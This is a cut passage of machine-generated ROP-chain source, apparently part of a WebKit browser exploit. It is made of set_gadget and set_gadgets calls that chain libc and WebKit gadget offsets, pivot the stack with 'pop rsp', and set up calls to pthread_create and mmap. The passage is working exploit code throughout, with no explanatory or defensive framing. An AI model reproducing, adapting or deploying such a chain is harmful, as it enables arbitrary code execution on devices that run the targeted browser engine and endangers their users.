//pop rsi ropchain+157272, //L2308 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2307: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2308: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2309: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2310: jop_frame_addr, libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+157416, //L2311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2311: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L2313: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157536, //L2316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157520, //L2314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2316: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+157680, //L2319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157648, //L2317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+157664, //L2318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2317: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2318: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2319: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+157760, //L2320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2322: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157880, //L2325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157864, //L2323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2325: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760, //pop rsi ropchain+158024, //L2328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157992, //L2326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+158008, //L2327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2326: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2327: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2328: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2330: ropchain+158128, //L2329 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+159008, //L2331 //L2329: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158272, //L2333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158288, //L2334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+158256, //L2332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2333: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2334: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+158400, //L2335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158432, //L2337 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+158416, //L2336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2337: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158536, //L2338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158552, //L2339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2338: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2339: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158672, //L2340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158656, //L2341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2341: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2340: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+158760, //L2343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+158744, //L2342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2343: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+158864, //L2344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158880, //L2345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2344: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2345: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+159000, //L2346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+158984, //L2347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2347: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2346: db([0, 0]); // 0x0 //L2331: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, 
//sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop 
rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx 
libc_base+763368, //pop rcx pthread_create_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+160328, //L2348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L2348: db([0, 0]); // 0x0 //L2121: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub 
rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); 
db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx mmap_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+161656, //L2349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L2349: db([0, 0]); // 0x0 //__out_buffer: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+161728, //L2351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2351: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+161824, //L2352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+161856, //L2355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2352: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2354: db([32, 0]); // 0x20 set_gadget(webkit_base+568675,); //pop r8 //L2355: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+161960, //L2358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+161944, //L2356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2358: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+162104, //L2361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+162072, //L2359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+162088, //L2360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2359: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2360: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2361: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+162184, //L2362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2364: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+162304, //L2367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, 
rdi libc_base+764760, //pop rsi ropchain+162288, //L2365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2367: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+162416, //L2368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162448, //L2370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+162432, //L2369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2368: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2369: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2370: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+162624, //L2372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162640, //L2373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+162608, //L2371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2373: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+162752, //L2375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+162800, 
//L2378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+162768, //L2376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2375: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+162912, //L2379+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+162904, //L2379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2379: db([0, 0]); // 0x0 set_gadgets([ ropchain+162928, //L2379+24 ropchain+165496, //L2374 libc_base+764760, //pop rsi ropchain+162968, //L2380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2380: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2382: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+163088, //L2385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+163072, //L2383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2385: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+163248, //L2389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+163216, //L2387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 
